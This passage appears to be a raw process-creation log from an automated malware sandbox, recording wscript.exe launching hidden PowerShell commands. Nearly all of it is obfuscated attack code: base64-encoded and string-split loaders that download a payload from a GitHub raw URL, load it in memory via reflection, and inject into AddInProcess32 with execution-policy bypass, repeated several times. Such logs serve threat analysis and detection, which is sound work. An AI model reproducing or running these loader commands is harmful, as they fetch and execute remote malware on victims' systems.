JwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAb